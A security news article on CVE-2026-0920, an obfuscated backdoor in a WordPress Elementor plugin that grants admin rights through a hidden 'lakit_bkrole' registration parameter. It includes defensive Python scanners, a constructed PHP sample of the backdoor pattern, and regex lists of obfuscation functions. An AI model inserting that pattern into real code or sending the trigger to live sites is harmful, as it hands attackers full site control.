A WordPress plugin flaw puts thousands of websites one step away from full compromise by letting attackers create administrator accounts without logging in.
The issue affects the LA-Studio Element Kit for Elementor plugin, which has 20,000+ active installs, and it enables unauthenticated administrator account creation through a hidden backdoor in the plugin's own code.
“Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would,” said Wordfence in its advisory.
How CVE-2026-0920 Works
The vulnerability, tracked as CVE-2026-0920, has been assigned a CVSS score of 9.8.
Researchers traced the flaw to the plugin’s user registration workflow, specifically within the ajax_register_handle function.
There, they found obfuscated backdoor logic designed to look like normal registration code while secretly checking for a hidden request parameter: lakit_bkrole.
If an attacker submits a specially crafted registration request containing that parameter, the plugin quietly triggers additional filters that assign administrator privileges to the newly created account.
In practical terms, this transforms a routine “create user” action into an unauthenticated privilege escalation path, allowing the attacker to gain full control of the WordPress dashboard without needing valid credentials.
With administrator access, an attacker can move quickly from account creation to full compromise.
Follow-on actions for threat actors can include installing malicious plugins or web shells, modifying site content to deliver malware, redirecting visitors to phishing pages, and injecting SEO spam designed to monetize traffic or manipulate search rankings.
Attackers can also establish long-term persistence by creating additional admin accounts, scheduling automated tasks, or making configuration changes.
Wordfence noted the backdoor was deliberately hidden through obfuscation techniques such as string manipulation and indirect function calls.
This approach makes malicious behavior more difficult to spot during routine reviews and allows it to blend into legitimate registration handling.
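The traits Wordfence describes (names assembled from string fragments, decoding helpers, variable-function calls, and a request key the registration flow has no legitimate reason to read) can be triaged mechanically before a full manual review. The script below is an added example, not code from the plugin, from LA-Studio or from Wordfence: the PHP sample it scans is constructed to exhibit those traits and is not the plugin's real source (the reversed filter name, variable names and structure are invented), and the list of expected request keys is an assumption about what a registration handler normally reads.

```python
"""Static triage for obfuscated backdoor traits in PHP plugin code (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed PHP sample showing the advisory's traits. NOT the plugin's real
# source: the reversed filter name, variable names and layout are invented.
SAMPLE_PHP = """\
<?php
function ajax_register_handle() {
    $user  = $_POST['username'];
    $email = $_POST['email'];
    $user_id = wp_create_user($user, wp_generate_password(), $email);
    if (isset($_REQUEST['lakit_bkrole'])) {
        $f = 'add_' . 'filter';
        $f(strrev('elor_tluafed_noitpo_erp'), function () { return 'administrator'; });
    }
}
"""

# Assumption: keys a registration handler legitimately reads. Anything else is flagged.
EXPECTED_KEYS = frozenset({"username", "email", "password", "nonce", "action"})

# Obfuscation heuristics: variable-function / call_user_func calls, decoding
# helpers that hide names, and literal-to-literal concatenation that assembles names.
TRAITS = {
    "indirect_call": re.compile(r"\bcall_user_func(?:_array)?\s*\(|\$\w+\s*\("),
    "string_decode": re.compile(r"\b(?:base64_decode|str_rot13|strrev|gzinflate|hex2bin)\s*\("),
    "literal_concat": re.compile(r"['\"][A-Za-z0-9_]+['\"]\s*\.\s*['\"][A-Za-z0-9_]+['\"]"),
}
REQUEST_KEY = re.compile(r"\$_(?:REQUEST|POST|GET|COOKIE)\s*\[\s*['\"]([A-Za-z0-9_]+)['\"]\s*\]")


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    detail: str


def scan_php(source: str, expected_keys=EXPECTED_KEYS) -> list[Finding]:
    """Return one Finding per suspicious trait, with the 1-based source line."""
    findings: list[Finding] = []
    for no, text in enumerate(source.splitlines(), start=1):
        for key in REQUEST_KEY.findall(text):
            if key not in expected_keys:
                findings.append(Finding(no, "unexpected_request_key", key))
        for kind, rx in TRAITS.items():
            m = rx.search(text)
            if m:
                findings.append(Finding(no, kind, m.group(0).strip()))
    return findings


def is_suspicious(findings: list[Finding]) -> bool:
    """Backdoor shape: an unexpected request key combined with any obfuscation trait."""
    kinds = {f.kind for f in findings}
    return "unexpected_request_key" in kinds and bool(kinds & set(TRAITS))


if __name__ == "__main__":
    results = scan_php(SAMPLE_PHP)
    for f in results:
        print(f"line {f.line:>3}  {f.kind:<22} {f.detail}")
    print("suspicious:", is_suspicious(results))
```

The heuristics are deliberately noisy: a variable-function call or a `base64_decode` on its own is common in legitimate code, so the script only calls a file suspicious when such a trait co-occurs with a request key outside the expected set. Use it to prioritise which plugin files get a line-by-line read, not as a verdict.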
LA-Studio has released a patch for the vulnerability, and Wordfence has released a firewall rule to block exploitation attempts. The rule blocks the request pattern but does not remove the backdoor code from the site, so it is a stopgap until the plugin is updated, not a substitute for the patch.
Security Controls to Reduce Blast Radius
If your organization runs WordPress, it’s worth addressing this vulnerability quickly and methodically.
Because the issue can allow unauthorized administrator account creation, remediation should include more than just applying the update.
- Patch immediately by upgrading LA-Studio Element Kit for Elementor to version 1.6.0 or later.
- Audit WordPress users for unauthorized administrator accounts, comparing the current admin list and registration dates against a known-good baseline, and remove any suspicious or unexpected admins.
- Inspect for persistence by reviewing recent plugin/theme installs, file changes (wp-config.php, .htaccess), cron jobs, and uploads in wp-content.
- Rotate credentials, enforce MFA, and reduce privileged access using least privilege and limited admin accounts.
- Restrict access to wp-admin and wp-login.php using IP allowlisting, VPN access, or additional authentication controls.
- Enable centralized logging and monitoring to detect abnormal registration requests, admin role changes, and unusual outbound traffic.
- Validate backups and regularly test incident response plans, including restore and rollback procedures for WordPress compromises.
These steps combine patching, account review, and basic integrity checks to confirm the site hasn’t been altered.
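The account audit and the log review above can be scripted so they are repeatable across many sites. The following is an added example, not code from the page or from any vendor: the user rows are a constructed export of the kind `wp user list` or a `wp_users`/`wp_usermeta` query would produce, the access-log lines are constructed, the cutoff date and the known-admin allowlist are assumptions, and the `lakit_bkrole` marker is the parameter named in the advisory.

```python
"""Post-incident audit for unexpected admins and backdoor requests (added example)."""
from __future__ import annotations

import re
from datetime import datetime

# Constructed user rows. wp_capabilities is the PHP-serialized array WordPress
# stores in wp_usermeta; the logins, IDs and dates are invented.
USERS = [
    {"ID": 1, "user_login": "siteowner", "user_registered": "2023-02-14 09:12:33",
     "wp_capabilities": 'a:1:{s:13:"administrator";b:1;}'},
    {"ID": 57, "user_login": "editor_jane", "user_registered": "2024-06-01 10:00:00",
     "wp_capabilities": 'a:1:{s:6:"editor";b:1;}'},
    {"ID": 2041, "user_login": "zk9x2", "user_registered": "2026-01-22 03:41:07",
     "wp_capabilities": 'a:2:{s:13:"administrator";b:1;s:10:"subscriber";b:1;}'},
]
KNOWN_ADMINS = {"siteowner"}  # assumption: the site's documented admin baseline

# Constructed combined-format access-log lines (IPs from documentation ranges).
ACCESS_LOG = """\
203.0.113.9 - - [22/Jan/2026:03:41:05 +0000] "POST /wp-admin/admin-ajax.php?lakit_bkrole=1 HTTP/1.1" 200 412 "-" "python-requests/2.31"
198.51.100.4 - - [22/Jan/2026:08:10:11 +0000] "GET /wp-login.php HTTP/1.1" 200 2710 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Jan/2026:03:41:09 +0000] "GET /wp-admin/ HTTP/1.1" 200 9001 "-" "python-requests/2.31"
"""

ROLE_RX = re.compile(r's:\d+:"([A-Za-z0-9_-]+)";b:1;')
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def roles_from_capabilities(serialized: str) -> set[str]:
    """Roles set to true in a PHP-serialized wp_capabilities array."""
    return set(ROLE_RX.findall(serialized))


def unexpected_admins(users, known_admins, registered_after: str) -> list[str]:
    """Administrators missing from the allowlist or registered after the cutoff."""
    cutoff = datetime.fromisoformat(registered_after)
    flagged = []
    for u in users:
        if "administrator" not in roles_from_capabilities(u["wp_capabilities"]):
            continue
        registered = datetime.fromisoformat(u["user_registered"])
        if u["user_login"] not in known_admins or registered > cutoff:
            flagged.append(u["user_login"])
    return flagged


def backdoor_requests(log_text: str, marker: str = "lakit_bkrole") -> list[tuple[str, str, str]]:
    """Requests whose query string carries the hidden parameter.

    Access logs record the request line only, so a marker sent in a POST body
    will not appear here; an empty result does not prove the site was not hit.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RX.match(line)
        if m and marker in m.group("path"):
            hits.append((m.group("ip"), m.group("ts"), m.group("path")))
    return hits


if __name__ == "__main__":
    print("unexpected admins:", unexpected_admins(USERS, KNOWN_ADMINS, "2025-12-31 00:00:00"))
    for ip, ts, path in backdoor_requests(ACCESS_LOG):
        print(f"backdoor request from {ip} at {ts}: {path}")
```

Because the POST body is not in the web server log, treat the log check as corroboration only; the authoritative signal is an administrator account you did not create, which is why the user audit runs against a baseline rather than against the log. A source IP that shows up in both results, as in the constructed data, is the pivot for the rest of the persistence review (uploads, cron entries, modified files).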
Plugin Security Is Site Security
For organizations that rely on WordPress and third-party plugins, CVE-2026-0920 is a reminder that a single compromised component can quickly become a full-site security issue.
Treat plugin updates as part of your overall security posture, not routine maintenance, and validate changes before and after deployment.
Vulnerabilities like this are a reminder why organizations are adopting zero-trust approaches to limit blast radius when any component is compromised.
